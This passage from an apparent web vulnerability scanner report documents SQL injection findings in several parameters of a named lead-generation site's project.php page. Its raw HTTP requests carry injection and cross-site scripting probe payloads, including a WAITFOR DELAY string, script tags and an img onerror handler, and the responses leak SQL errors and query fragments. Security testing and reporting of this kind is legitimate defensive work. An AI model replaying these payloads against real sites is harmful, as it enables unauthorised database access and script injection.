Request 2

GET /ppc/leadflow/caad00/project.php?catId=30011''&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=2pjnbitej55vkh5io4gs6s4qm1; JSESSIONID=33EE9FE085003FE12148DEE225377D13; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:53:19 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 106
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/caad00/project.php was not found on this server.</p>

1.132. http://www.insideup.com/ppc/leadflow/caad00/project.php [companyname parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The companyname parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the companyname parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/caad00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A7455393AF782B871C13625AD15C8267; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:53:51 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=pmn51o819kmkiun21acg58ntb7; path=/
Content-Length: 6638
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5

1.133. http://www.insideup.com/ppc/leadflow/caad00/project.php [companyname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The companyname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the companyname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name'&emailaddress=Email&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:06:05 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 6790
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
</a style=x:expre/**/ssion(netsparker(0x002302))>&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&lastname=</a style=x:expre/**/ssion(netsparker(0x002302))>
...[SNIP]...

Request 2

GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name''&emailaddress=Email&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:06:05 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35987


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.134. http://www.insideup.com/ppc/leadflow/caad00/project.php [emailaddress parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The emailaddress parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the emailaddress parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/caad00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email'&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A7455393AF782B871C13625AD15C8267; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:54:03 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=rh639igkk1lo3veuoj8qbgbcd1; path=/
Content-Length: 6638
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email'&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5

1.135. http://www.insideup.com/ppc/leadflow/caad00/project.php [emailaddress parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The emailaddress parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the emailaddress parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email'&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:08:34 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 6790
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
</a style=x:expre/**/ssion(netsparker(0x002302))>&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&lastname=</a style=x:expre/**/ssion(netsparker(0x002302))>
...[SNIP]...

Request 2

GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email''&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:08:35 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51731


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.136. http://www.insideup.com/ppc/leadflow/caad00/project.php [firstname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The firstname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the firstname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&firstname=First+Name'&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:01:39 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=p4b8e99g21fv8f03jtado7arh2; path=/
Content-Length: 6702
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
<iMg src=N onerror=netsparker(9)>&firstname=First Name'&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code' OR prj.project_pa' at line 5

Request 2

GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&firstname=First+Name''&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
